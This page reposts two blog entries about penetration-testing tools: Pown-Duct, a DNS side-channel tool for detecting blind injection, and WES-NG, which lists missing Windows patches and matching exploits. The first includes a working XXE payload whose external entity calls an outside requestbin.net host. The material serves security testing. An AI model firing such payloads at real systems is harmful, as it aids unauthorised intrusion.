Pown-Duct – Essential Tool For Finding Blind Injection Attacks

Essential tool for finding blind injection attacks using DNS side-channels.CreditsThis tool is part of secapps.com open-source initiative. ___ ___ ___ _ ___ ___ ___ / __| __/ __| /_\ | _ \ _ \/ __| \__ \ _| (__ / _ \| _/ _/\__ \ |___/___\___/_/ \_\_| |_| |___/ https://secapps.comNB: This tool is taking advantage of http://requestbin.net service. Future versions will use a dedicated, custom-built infrastructure.QuickstartThis tool is meant to be used as part of Pown.js but it can be invoked separately as an independent tool.Install Pown first as usual:$ npm install -g pown@latestInvoke directly from Pown:$ pown ductOtherwise, install this module locally from the root of your project:$ npm install @pown/duct –saveOnce done, invoke pown cli:$ ./node_modules/.bin/pown-cli ductYou can also use the global pown to invoke the tool locally:$ POWN_ROOT=. pown ductUsagepown duct Side-channel attack enablerCommands: pown duct dns DNS ductingOptions: –version Show version number [boolean] –help Show help [boolean]pown duct dnspown duct dnsDNS ductingOptions: –version Show version number [boolean] –help Show help [boolean] –channel Restore channel [string] –output Output format [string] [choices: “string", "hexdump", "json"] [default: "string"]TutorialThere are cases when we need to perform an attack such as sql injection, XSS, XXE or SSRF but the target application is not providing any indication that it is vulnerable. One way to be sure if a vulnerability is present is to try to inject a valid attack vector which forces a DNS resolver to ask for a controlled domain. If the resolution is successful, the attack will be considered successful.NOTE: You might be familiar with Burp Collaborator which provides a similar service for customers.First, we need a disposable dns name to resolve:$ pown duct dnsUsing the provided DNS, compose your payload. For example, the following could trigger a DNS resolution if a XXE vulnerability is present.<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">]><foo>&bar;</foo>If the attack was successful, we will get a message in the terminal.Download Pown-Duct

Link: http://feedproxy.google.com/~r/PentestTools/~3/mkfG1rnLQZQ/pown-duct-essential-tool-for-finding.html

Wesng – Windows Exploit Suggester

WES-NG is a tool based on the output of Windows’ systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.UsageObtain the latest database of vulnerabilities by executing the command wes.py –update.Use Windows’ built-in systeminfo.exe tool to obtain the system information of the local system, or from a remote system using systeminfo.exe /S MyRemoteHost, and redirect this to a file: systeminfo > systeminfo.txtExecute WES-NG with the systeminfo.txt output file as the parameter: wes.py systeminfo.txt. WES-NG then uses the database to determine which patches are applicable to the system and to which vulnerabilities are currently exposed, including exploits if available.As the data provided by Microsoft is frequently incomplete and false positives are reported by wes.py, make sure to check the Eliminating false positives page at the Wiki on how to deal with this. For an overview of all available parameters, check CMDLINE.md.CollectorThis GitHub repository regularly updates the database of vulnerabilities, so running wes.py with the –update parameter gets the latest version. If manual generation of the .csv file with hotfix information is required, use the scripts from the /collector folder to compile the database. Read the comments at the top of each script and execute them in the order as they are listed below. Executing these scripts will produce CVEs.csv. The WES-NG collector pulls information from various sources:Microsoft Security Bulletin Data: KBs for older systems [1]MSRC: The Microsoft Security Update API of the Microsoft Security Response Center (MSRC): Standard source of information for modern Microsoft Updates [2]NIST National Vulnerability Database (NVD): Complement vulnerabilities with Exploit-DB links [3] These are combined into a single .csv file which is compressed and hosted in this GitHub repository.RationaleI developed WES-NG because while GDSSecurity’s Windows-Exploit-Suggester worked excellently for operating systems in the Windows XP and Windows Vista era, GDSSecurity’s Windows-Exploit-Suggester does not work for operating systems like Windows 10 and vulnerabilities published in recent years. This is because Microsoft replaced the Microsoft Security Bulletin Data Excel file [1] on which GDSSecurity’s Windows-Exploit-Suggester is fully dependent, by the MSRC API [2]. The Microsoft Security Bulletin Data Excel file has not been updated since Q1 2017, so later operating systems and vulnerabilities cannot be detected. Thanks @gdssecurity, for this great tool which has served many of us for so many years!BugsBugs can be submitted via the Issues pageFor false positives in results, please read the Eliminating false positives page at the Wiki first. In case that doesn’t significantly reduce the number of false positives, follow the steps at the Report false positives page on the WikiChangelogSee CHANGELOG.mdImprovementsAdd support for NoPowerShell’s Get-SystemInfo cmdlet outputAdd support for wmic qfe output together with support for parameters to manually specify the operating systemAdd support for alternative output formats of systeminfo (csv, table)More testing on the returned false positive vulnerabilities – see also the wikiAdd support for Itanium architecutureReferences[1] https://www.microsoft.com/download/details.aspx?id=36982[2] https://portal.msrc.microsoft.com/en-us/developer[3] https://nvd.nist.gov/vuln/data-feedsAuthored by Arris Huijgen (@bitsadmin – https://github.com/bitsadmin/)Download Wesng

Link: http://feedproxy.google.com/~r/PentestTools/~3/S-0NXhKzPf0/wesng-windows-exploit-suggester.html